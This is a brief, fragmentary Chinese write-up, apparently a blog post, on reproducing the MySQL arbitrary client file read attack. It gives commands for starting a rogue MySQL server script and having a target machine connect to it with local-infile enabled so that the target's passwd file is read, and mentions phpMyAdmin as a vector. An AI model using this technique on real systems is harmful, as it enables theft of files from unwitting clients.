Mysql任意读取客户端文件复现
本机执行
python rogue_mysql_server.py
目标机器上连接本机数据库
mysql -u root -p -h 本机IP
mysql -h 192.168.250.132 -uroot -p --enable-local-infile
本机即可读取到目标机器上的passwd文件
修改读取文件
其它利用方式
后话
至于如果在目标机器上连接本机mysql----比如phpmyadmin
python rogue_mysql_server.py
mysql -u root -p -h 本机IP
mysql -h 192.168.250.132 -uroot -p --enable-local-infile
至于如果在目标机器上连接本机mysql----比如phpmyadmin
浙公网安备 33010602011771号